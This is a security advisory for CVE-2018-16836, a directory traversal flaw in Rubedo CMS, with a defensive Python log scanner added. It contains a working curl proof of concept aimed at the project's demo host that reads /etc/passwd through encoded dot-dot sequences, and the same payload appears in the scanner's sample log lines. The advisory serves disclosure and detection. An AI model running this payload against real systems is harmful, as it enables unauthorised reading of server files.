
CVE-2018-16836

This page was used as a reference for a CVE request. Link to the CVE entry:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16836

Vulnerability

Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside the service root path.

Attack Vector

An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) in parameters to navigate to arbitrary files on the system.

Impact

Code execution + Information Disclosure

Discoverer

Marouene Boubakri

PoC

curl -k 'https://demo.rubedo-project.org/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..//etc/passwd'

The result is disclosure of the /etc/passwd file.

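A defender-side check for the request pattern described under Attack Vector, added here as an example (not code from this advisory or from the Rubedo project): it percent-decodes and normalises each logged /theme/ request and reports those that resolve outside the theme prefix, along with the response status for triage. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

THEME_PREFIX = "/theme/"   # URL prefix taken from the PoC request on this page
MAX_DECODE_ROUNDS = 3      # assumption: intermediaries may decode more than once

# Request line and status of a "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(path):
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_theme_root(target):
    """True if a /theme/ request resolves outside /theme/ once decoded."""
    path = urlsplit(target).path
    if not path.startswith(THEME_PREFIX):
        return False
    decoded = fully_decode(path).replace("\\", "/")
    resolved = posixpath.normpath(decoded)   # collapses "..", "." and "//"
    return not (resolved + "/").startswith(THEME_PREFIX)

def flag_traversal(log_lines):
    """Return (target, status) for each logged request that escapes the theme root."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and escapes_theme_root(m.group(1)):
            hits.append((m.group(1), int(m.group(2))))
    return hits

# Constructed sample log lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /theme/default/img/logo.png HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /theme/default/img/../css/main.css HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2024:10:00:02 +0000] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1834',
]

if __name__ == "__main__":
    for target, status in flag_traversal(SAMPLE_LOG):
        print(status, target)
```

A flagged request that was answered with status 200 deserves review first, since the file may have been served. The second sample line contains `..` but stays inside the theme directory, so it is not flagged.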

Fixes

I contacted the Rubedo CMS development team to patch the vulnerability and provide support to their affected customers.
